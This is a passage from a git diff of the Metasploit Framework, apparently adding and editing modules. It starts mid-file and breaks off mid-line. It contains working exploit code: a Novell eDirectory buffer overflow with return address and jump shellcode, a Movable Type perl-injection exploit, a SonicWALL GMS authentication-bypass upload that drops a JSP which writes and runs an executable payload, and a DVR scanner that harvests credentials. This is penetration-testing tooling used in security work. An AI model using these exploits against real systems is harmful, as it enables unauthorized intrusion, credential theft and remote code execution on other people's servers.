475 ) + + connect + sock.put(req) + + buf = "" + begin + # Pull data until the socket closes or we time out + Timeout.timeout(15) do + loop do + res = sock.get_once(-1, 1) + buf << res if res + end + end + rescue ::Timeout::Error + rescue ::EOFError + end + + disconnect + + info = "" + mac = nil + ver = nil + + creds = {} + + buf.scan(/[\x00\xff]([\x20-\x7f]{1,32})\x00+([\x20-\x7f]{1,32})\x00\x00([\x20-\x7f]{1,32})\x00/m).each do |cred| + # Make sure the two passwords match + next unless cred[1] == cred[2] + creds[cred[0]] = cred[1] + end + + if creds.keys.length > 0 + creds.keys.sort.each do |user| + pass = creds[user] + report_auth_info({ + :host => rhost, + :port => rport, + :sname => 'dvr', + :duplicate_ok => false, + :user => user, + :pass => pass + }) + info << "(user='#{user}' pass='#{pass}') " + end + end + + # Look for MAC address + if buf =~ /([0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2})/mi + mac = $1 + end + + # Look for version + if buf =~ /(V[0-9]+\.[0-9][^\x00]+)/m + ver = $1 + end + + info << "mac=#{mac} " if mac + info << "version=#{ver} " if ver + + return unless (creds.keys.length > 0 or mac or ver) + + report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => info) + print_good("#{rhost}:#{rport} #{info}") + end + +end diff --git a/modules/auxiliary/scanner/rdp/ms12-020_check.rb b/modules/auxiliary/scanner/rdp/ms12-020_check.rb new file mode 100644 index 0000000000..93dc4bc58a --- /dev/null +++ b/modules/auxiliary/scanner/rdp/ms12-020_check.rb @@ -0,0 +1,198 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MS12-020 Microsoft Remote Desktop Checker', + 'Description' => %q{ + This module checks a range of hosts for the MS12-020 vulnerability. + This does not cause a DoS on the target. + }, + 'References' => + [ + [ 'CVE', '2012-0002' ], + [ 'MSB', 'MS12-020' ], + [ 'URL', 'http://technet.microsoft.com/en-us/security/bulletin/ms12-020' ], + [ 'EDB', '18606' ], + [ 'URL', 'https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse' ] + ], + 'Author' => + [ + 'Royce Davis @R3dy_ ', + 'Brandon McCann @zeknox ' + ], + 'License' => MSF_LICENSE, + )) + + register_options( + [ + OptInt.new('RPORT', [ true, 'Remote port running RDP', '3389' ]) + ], self.class) + end + + def checkRdp(packet) + # code to check if RDP is open or not + vprint_status("#{peer} - Verifying RDP Protocol") + begin + # send connection + sock.put(packet) + # read packet to see if its rdp + res = sock.recv(1024) + + if res.unpack("H*").join == "0300000b06d00000123400" + return true + else + return false + end + rescue + print_error("could not connect to RHOST") + return false + end + end + + def connectionRequest() + packet = '' + + "\x03\x00" + # TPKT Header version 03, reserved 0 + "\x00\x0b" + # Length + "\x06" + # X.224 Data TPDU length + "\xe0" + # X.224 Type (Connection request) + "\x00\x00" + # dst reference + "\x00\x00" + # src reference + "\x00" # class and options + return packet + end + + def report_goods + report_vuln( + :host => rhost, + :port => rport, + :proto => 'tcp', + :name => 'The MS12-020 Checker', + :vuln => 'Confirmaiton that this host is vulnerable to MS12-020', + :refs => self.references, + :exploited_at => Time.now.utc + ) + end + + def connectInitial() + packet = '' + + "\x03\x00\x00\x65" + # TPKT Header + "\x02\xf0\x80" + # Data TPDU, EOT + "\x7f\x65\x5b" + # Connect-Initial + "\x04\x01\x01" + # callingDomainSelector + "\x04\x01\x01" + # callingDomainSelector + "\x01\x01\xff" + # upwardFlag + "\x30\x19" + # targetParams + size + "\x02\x01\x22" + # maxChannelIds + "\x02\x01\x20" + # maxUserIds + "\x02\x01\x00" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x02\xff\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x30\x18" + # minParams + size + "\x02\x01\x01" + # maxChannelIds + "\x02\x01\x01" + # maxUserIds + "\x02\x01\x01" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x01\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x30\x19" + # maxParams + size + "\x02\x01\xff" + # maxChannelIds + "\x02\x01\xff" + # maxUserIds + "\x02\x01\xff" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x02\xff\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x04\x00" # userData + return packet + end + + def userRequest() + packet = '' + + "\x03\x00" + # header + "\x00\x08" + # length + "\x02\xf0\x80" + # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT, end of transmission) + "\x28" # PER encoded PDU contents + return packet + end + + def channelRequestOne + packet = '' + + "\x03\x00\x00\x0c" + + "\x02\xf0\x80\x38" + + "\x00\x01\x03\xeb" + return packet + end + + def channelRequestTwo + packet = '' + + "\x03\x00\x00\x0c" + + "\x02\xf0\x80\x38" + + "\x00\x02\x03\xeb" + return packet + end + + def peer + return "#{rhost}:#{rport}" + end + + def run_host(ip) + begin + # open connection + connect() + rescue + return + end + + # check if rdp is open + if checkRdp(connectionRequest) + + # send connectInitial + sock.put(connectInitial) + # send userRequest + sock.put(userRequest) + user1_res = sock.recv(1024) + # send 2nd userRequest + sock.put(userRequest) + user2_res = sock.recv(1024) + # send channel request one + sock.put(channelRequestOne) + channel_one_res = sock.recv(1024) + if channel_one_res.unpack("H*").to_s[16..19] == '3e00' + # vulnerable + print_good("#{peer} - Vulnerable to MS12-020") + report_goods + + # send ChannelRequestTwo - prevent bsod + sock.put(channelRequestTwo) + + # report to the database + else + vprint_error("#{peer} - Not Vulnerable") + end + + end + # close connection + disconnect() + end + +end + diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index 8ffe83a4bb..346f6f04ac 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -24,12 +24,21 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB Local User Enumeration (LookupSid)', - 'Description' => 'Determine what local users exist via brute force SID lookups', + 'Description' => 'Determine what users exist via brute force SID lookups. + This module can enumerate both local and domain accounts by setting + ACTION to either LOCAL or DOMAIN', 'Author' => 'hdm', 'License' => MSF_LICENSE, - 'DefaultOptions' => { - 'DCERPC::fake_bind_multi' => false - } + 'DefaultOptions' => + { + 'DCERPC::fake_bind_multi' => false + }, + 'Actions' => + [ + ['LOCAL', { 'Description' => 'Enumerate local accounts' } ], + ['DOMAIN', { 'Description' => 'Enumerate domain accounts' } ] + ], + 'DefaultAction' => 'LOCAL' ) register_options( @@ -206,6 +215,8 @@ class Metasploit3 < Msf::Auxiliary :groups => {} } + target_sid = host_sid if action.name =~ /LOCAL/i + target_sid = domain_sid if action.name =~ /DOMAIN/i # Brute force through a common RID range 500.upto(datastore['MaxRID'].to_i) do |rid| @@ -216,7 +227,7 @@ class Metasploit3 < Msf::Auxiliary NDR.long(1) + NDR.long(rand(0x10000000)) + NDR.long(5) + - smb_pack_sid(host_sid) + + smb_pack_sid(target_sid) + NDR.long(rid) + NDR.long(0) + NDR.long(0) + diff --git a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb new file mode 100644 index 0000000000..36b0020b42 --- /dev/null +++ b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb @@ -0,0 +1,133 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Novell eDirectory 8 Buffer Overflow', + 'Description' => %q{ + This exploit abuses a buffer overflow vulnerability in Novell eDirectory. The + vulnerability exists in the ndsd daemon, specifically in the NCP service, while + parsing a specially crafted Keyed Object Login request. It allows remote code + execution with root privileges. + }, + 'Author' => + [ + 'David Klein', # Vulnerability Discovery + 'Gary Nilson', # Exploit + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-0432'], + [ 'OSVDB', '88718'], + [ 'BID', '57038' ], + [ 'EDB', '24205' ], + [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=3426981' ], + [ 'URL', 'http://seclists.org/fulldisclosure/2013/Jan/97' ] + ], + 'DisclosureDate' => 'Dec 12 2012', + 'Platform' => 'linux', + 'Privileged' => true, + 'Arch' => ARCH_X86, + 'Payload' => + { + + }, + 'Targets' => + [ + [ 'Novell eDirectory 8.8.7 v20701.33/ SLES 10 SP3', + { + 'Ret' => 0x080a4697, # jmp esi from ndsd + 'Offset' => 58 + } + ] + ], + 'DefaultTarget' => 0 + )) + + register_options([Opt::RPORT(524),], self.class) + end + + def check + connect + sock.put(connection_request) + res = sock.get + disconnect + if res.nil? or res[8, 2].unpack("n")[0] != 0x3333 or res[15, 1].unpack("C")[0] != 0 + # res[8,2] => Reply Type + # res[15,1] => Connection Status + return Exploit::CheckCode::Safe + end + return Exploit::CheckCode::Detected + end + + def connection_request + pkt = "\x44\x6d\x64\x54" # NCP TCP id + pkt << "\x00\x00\x00\x17" # request_size + pkt << "\x00\x00\x00\x01" # version + pkt << "\x00\x00\x00\x00" # reply buffer size + pkt << "\x11\x11" # cmd => create service connection + pkt << "\x00" # sequence number + pkt << "\x00" # connection number + pkt << "\x00" # task number + pkt << "\x00" # reserved + pkt << "\x00" # request code + + return pkt + end + + def exploit + + connect + + print_status("Sending Service Connection Request...") + sock.put(connection_request) + res = sock.get + if res.nil? or res[8, 2].unpack("n")[0] != 0x3333 or res[15, 1].unpack("C")[0] != 0 + # res[8,2] => Reply Type + # res[15,1] => Connection Status + fail_with(Exploit::Failure::UnexpectedReply, "Service Connection failed") + end + print_good("Service Connection successful") + + pkt = "\x44\x6d\x64\x54" # NCP TCP id + pkt << "\x00\x00\x00\x00" # request_size (filled later) + pkt << "\x00\x00\x00\x01" # version (1) + pkt << "\x00\x00\x00\x05" # reply buffer size + pkt << "\x22\x22" # cmd + pkt << "\x01" # sequence number + pkt << res[11] # connection number + pkt << "\x00" # task number + pkt << "\x00" # reserved + pkt << "\x17" # Login Object FunctionCode (23) + pkt << "\x00\xa7" # SubFuncStrucLen + pkt << "\x18" # SubFunctionCode + pkt << "\x90\x90" # object type + pkt << "\x50" # ClientNameLen + pkt << rand_text(7) + jmp_payload = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+#{target['Offset'] + 4}").encode_string + pkt << jmp_payload # first byte is the memcpy length, must be bigger than 62 to to overwrite EIP + pkt << rand_text(target['Offset'] - jmp_payload.length) + pkt << [target.ret].pack("V") + pkt << payload.encoded + + pkt[4,4] = [pkt.length].pack("N") + + print_status("Sending Overflow on Keyed Object Login...") + sock.put(pkt) + sock.get + disconnect + end + +end diff --git a/modules/exploits/multi/browser/java_jre17_method_handle.rb b/modules/exploits/multi/browser/java_jre17_method_handle.rb index 623bc31c8e..af8f2e1722 100644 --- a/modules/exploits/multi/browser/java_jre17_method_handle.rb +++ b/modules/exploits/multi/browser/java_jre17_method_handle.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ [ 'CVE', '2012-5088' ], - [ 'URL', '86352' ], + [ 'OSVDB', '86352' ], [ 'BID', '56057' ], [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ], [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ] diff --git a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb index 0895037634..d9c8e87e8d 100644 --- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb +++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit peer = "#{rhost}:#{rport}" uri = normalize_uri(target_uri.path) - uri << '/' if target_uri.path[-1,1] != '/' + uri << '/' if uri[-1,1] != '/' # Trigger the command execution bug res = send_request_cgi({ diff --git a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb index 107cb3dd29..f196e48619 100644 --- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb +++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GoodRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb index 7d94d5640b..bc195f03a9 100644 --- a/modules/exploits/multi/http/jenkins_script_console.rb +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GoodRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStagerVBS diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb new file mode 100644 index 0000000000..96c4a846cb --- /dev/null +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -0,0 +1,122 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit4 < Msf::Exploit::Remote + + include Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution', + 'Description' => %q{ + This module can be used to execute a payload on MoveableType (MT) that + exposes a CGI script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi), + that is used during installation and updating of the platform. + The vulnerability arises due to the following properties: + 1. This script may be invoked remotely without requiring authentication + to any MT instance. + 2. Through a crafted POST request, it is possible to invoke particular + database migration functions (i.e functions that bring the existing + database up-to-date with an updated codebase) by name and with + particular parameters. + 3. A particular migration function, core_drop_meta_for_table, allows + a class parameter to be set which is used directly in a perl eval + statement, allowing perl code injection. + }, + 'Author' => + [ + 'Kacper Nowak', + 'Nick Blundell', + 'Gary O\'Leary-Steele' + ], + 'References' => + [ + ['CVE', '2012-6315'], # superseded by CVE-2013-0209 (duplicate) + ['CVE', '2013-0209'], + ['URL', 'http://www.sec-1.com/blog/?p=402'], + ['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html'] + ], + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd' + } + }, + 'Platform' => + [ + 'win', + 'unix' + ], + 'Targets' => + [ + ['Movable Type 4.2x, 4.3x', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => "Jan 07 2013", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI path of the Movable Type installation', '/mt']) + ], self.class) + end + + def check + @peer = "#{rhost}:#{rport}" + fingerprint = rand_text_alpha(5) + print_status("#{@peer} - Sending check...") + begin + res = http_send_raw(fingerprint) + rescue Rex::ConnectionError + return Exploit::CheckCode::Unknown + end + if (res) + if (res.code == 200 and res.body =~ /Can't locate object method \\"dbi_driver\\" via package \\"#{fingerprint}\\" at/) + return Exploit::CheckCode::Vulnerable + elsif (res.code != 200) + return Exploit::CheckCode::Unknown + else + return Exploit::CheckCode::Safe + end + else + return Exploit::CheckCode::Unknown + end + end + + def exploit + @peer = "#{rhost}:#{rport}" + print_status("#{@peer} - Sending payload...") + http_send_cmd(payload.encoded) + end + + def http_send_raw(cmd) + path = normalize_uri(target_uri.path) + '/mt-upgrade.cgi' + pay = cmd.gsub('\\', '\\\\').gsub('"', '\"') + send_request_cgi( + { + 'uri' => path, + 'method' => 'POST', + 'vars_post' => + { + '__mode' => 'run_actions', + 'installing' => '1', + 'steps' => %{[["core_drop_meta_for_table","class","#{pay}"]]} + } + }) + end + + def http_send_cmd(cmd) + pay = 'v0;use MIME::Base64;system(decode_base64(q(' + pay << Rex::Text.encode_base64(cmd) + pay << ')));return 0' + http_send_raw(pay) + end +end diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb new file mode 100644 index 0000000000..4abf1ce645 --- /dev/null +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -0,0 +1,279 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GoodRanking + + HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SonicWALL GMS 6 Arbitrary File Upload', + 'Description' => %q{ + This module exploits a code execution flaw in SonicWALL GMS. It exploits two + vulnerabilities in order to get its objective. An authentication bypass in the + Web Administration interface allows to abuse the "appliance" application and upload + an arbitrary payload embedded in a JSP. The module has been tested successfully on + SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual + Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run + successfully while testing, shell payload have been used. + }, + 'Author' => + [ + 'Nikolas Sotiriu', # Vulnerability Discovery + 'Julian Vilas ', # Metasploit module + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2013-1359'], + [ 'OSVDB', '89347' ], + [ 'BID', '57445' ], + [ 'EDB', '24204' ] + ], + 'Privileged' => true, + 'Platform' => [ 'win', 'linux' ], + 'Targets' => + [ + [ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2', + { + 'Arch' => ARCH_X86, + 'Platform' => 'win' + } + ], + [ 'SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 17 2012')) + + register_options( + [ + Opt::RPORT(80), + OptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/']) + ], self.class) + end + + + def on_new_session + # on_new_session will force stdapi to load (for Linux meterpreter) + end + + + def generate_jsp + var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8) + var_exepath = Rex::Text.rand_text_alpha(rand(8)+8) + var_data = Rex::Text.rand_text_alpha(rand(8)+8) + var_inputstream = Rex::Text.rand_text_alpha(rand(8)+8) + var_outputstream = Rex::Text.rand_text_alpha(rand(8)+8) + var_numbytes = Rex::Text.rand_text_alpha(rand(8)+8) + var_bytearray = Rex::Text.rand_text_alpha(rand(8)+8) + var_bytes = Rex::Text.rand_text_alpha(rand(8)+8) + var_counter = Rex::Text.rand_text_alpha(rand(8)+8) + var_char1 = Rex::Text.rand_text_alpha(rand(8)+8) + var_char2 = Rex::Text.rand_text_alpha(rand(8)+8) + var_comb = Rex::Text.rand_text_alpha(rand(8)+8) + var_exe = Rex::Text.rand_text_alpha(rand(8)+8) + @var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8) + var_proc = Rex::Text.rand_text_alpha(rand(8)+8) + var_fperm = Rex::Text.rand_text_alpha(rand(8)+8) + var_fdel = Rex::Text.rand_text_alpha(rand(8)+8) + + jspraw = "<%@ page import=\"java.io.*\" %>\n" + jspraw << "<%\n" + jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"/#{@var_hexfile}.txt\";\n" + jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n" + jspraw << "String #{var_data} = \"\";\n" + + jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n" + jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n" + jspraw << "}\n" + + jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n" + jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n" + + jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n" + jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n" + jspraw << "#{var_inputstream}.read(#{var_bytearray});\n" + jspraw << "#{var_inputstream}.close();\n" + + jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n" + jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n" + jspraw << "{\n" + jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n" + jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n" + jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n" + jspraw << "#{var_comb} <<= 4;\n" + jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n" + jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n" + jspraw << "}\n" + + jspraw << "#{var_outputstream}.write(#{var_bytes});\n" + jspraw << "#{var_outputstream}.close();\n" + + jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1){\n" + jspraw << "String[] #{var_fperm} = new String[3];\n" + jspraw << "#{var_fperm}[0] = \"chmod\";\n" + jspraw << "#{var_fperm}[1] = \"+x\";\n" + jspraw << "#{var_fperm}[2] = #{var_exepath};\n" + jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\n" + jspraw << "if (#{var_proc}.waitFor() == 0) {\n" + jspraw << "#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n" + jspraw << "}\n" + # Linux and other UNICES allow removing files while they are in use... + jspraw << "File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\n" + jspraw << "} else {\n" + # Windows does not .. + jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n" + jspraw << "}\n" + + jspraw << "%>\n" + return jspraw + end + + def get_install_path + res = send_request_cgi( + { + 'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1", + 'method' => 'POST', + 'connection' => 'TE, close', + 'headers' => + { + 'TE' => "deflate,gzip;q=0.3", + }, + 'vars_post' => { + 'num' => '123456', + 'action' => 'show_diagnostics', + 'task' => 'search', + 'item' => 'application_log', + 'criteria' => '*.*', + 'width' => '500' + } + }) + + if res and res.code == 200 and res.body =~ /VALUE="(.*)logs/ + return $1 + end + + return nil + end + + def upload_file(location, filename, contents) + post_data = Rex::MIME::Message.new + post_data.add_part("file_system", nil, nil, "form-data; name=\"action\"") + post_data.add_part("uploadFile", nil, nil, "form-data; name=\"task\"") + post_data.add_part(location, nil, nil, "form-data; name=\"searchFolder\"") + post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadFilename\"; filename=\"#{filename}\"") + + data = post_data.to_s + data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") + + res = send_request_cgi( + { + 'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1", + 'method' => 'POST', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'headers' => + { + 'TE' => "deflate,gzip;q=0.3", + }, + 'connection' => 'TE, close' + }) + + if res and res.code == 200 and res.body.empty? + return true + else + return false + end + end + + def check + @peer = "#{rhost}:#{rport}" + @uri = normalize_uri(target_uri.path) + @uri << '/' if @uri[-1,1] != '/' + + if get_install_path.nil? + return Exploit::CheckCode::Safe + end + + return Exploit::CheckCode::Vulnerable + end + + def exploit + @peer = "#{rhost}:#{rport}" + @uri = normalize_uri(target_uri.path) + @uri << '/' if @uri[-1,1] != '/' + + # Get Tomcat installation path + print_status("#{@peer} - Retrieving Tomcat installation path...") + install_path = get_install_path + + if install_path.nil? + fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path") + end + + print_good("#{@peer} - Tomcat installed on #{install_path}") + + if target['Platform'] == "linux" + @location = "#{install_path}webapps/appliance/" + elsif target['Platform'] == "win" + @location = "#{install_path}webapps\\appliance\\" + end + + + # Upload the JSP and the raw payload + @jsp_name = rand_text_alphanumeric(8+rand(8)) + + jspraw = generate_jsp + + # Specify the payload in hex as an extra file.. + payload_hex = payload.encoded_exe.unpack('H*')[0] + + print_status("#{@peer} - Uploading the payload") + + if upload_file(@location, "#{@var_hexfile}.txt", payload_hex) + print_good("#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt") + else + fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the Payload") + end + + print_status("#{@peer} - Uploading the payload") + + if upload_file(@location, "#{@jsp_name}.jsp", jspraw) + print_good("#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp") + else + fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the jsp") + end + + print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...") + res = send_request_cgi( + { + 'uri' => "#{@uri}appliance/#{@jsp_name}.jsp", + 'method' => 'GET' + }) + + if res and res.code != 200 + print_warning("#{@peer} - Error triggering the payload") + end + + register_files_for_cleanup("#{@location}#{@var_hexfile}.txt") + register_files_for_cleanup("#{@location}#{@jsp_name}.jsp") + end + +end diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index f53da514dd..4bf8cc5abd 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_code_exec.rb b/modules/exploits/multi/http/struts_code_exec.rb index 1c4bfc9e07..1ff0316708 100644 --- a/modules/exploits/multi/http/struts_code_exec.rb +++ b/modules/exploits/multi/http/struts_code_exec.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GoodRanking include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb index caa7d8b2da..f33f57bfb1 100644 --- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb +++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote ] ], 'DisclosureDate' => 'Jan 06 2012', - 'DefaultTarget' => 0)) + 'DefaultTarget' => 2)) register_options( [ diff --git a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb new file mode 100644 index 0000000000..c405327ab0 --- /dev/null +++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb @@ -0,0 +1,148 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'ZoneMinder Video Server packageControl Command Execution', + 'Description' => %q{ + This module exploits a command execution vulnerability in ZoneMinder Video + Server version 1.24.0 to 1.25.0 which could be abused to allow + authenticated users to execute arbitrary commands under the context of the + web server user. The 'packageControl' function in the + 'includes/actions.php' file calls 'exec()' with user controlled data + from the 'runState' parameter. + }, + 'References' => + [ + ['URL', 'http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/'], + ], + 'Author' => + [ + 'Brendan Coles ', # Discovery and exploit + ], + 'License' => MSF_LICENSE, + 'Privileged' => true, + 'Arch' => ARCH_CMD, + 'Platform' => 'unix', + 'Payload' => + { + 'BadChars' => "\x00", + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic telnet python perl bash', + }, + }, + 'Targets' => + [ + ['Automatic Targeting', { 'auto' => true }] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => "Jan 22 2013", + )) + + register_options([ + OptString.new('USERNAME', [true, 'The ZoneMinder username', 'admin']), + OptString.new('PASSWORD', [true, 'The ZoneMinder password', 'admin']), + OptString.new('TARGETURI', [true, 'The path to the web application', '/zm/']) + ], self.class) + end + + def check + + peer = "#{rhost}:#{rport}" + base = target_uri.path + base << '/' if base[-1, 1] != '/' + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6) + data = "action=login&view=version&username=#{user}&password=#{pass}" + + # login and retrieve software version + print_status("#{peer} - Authenticating as 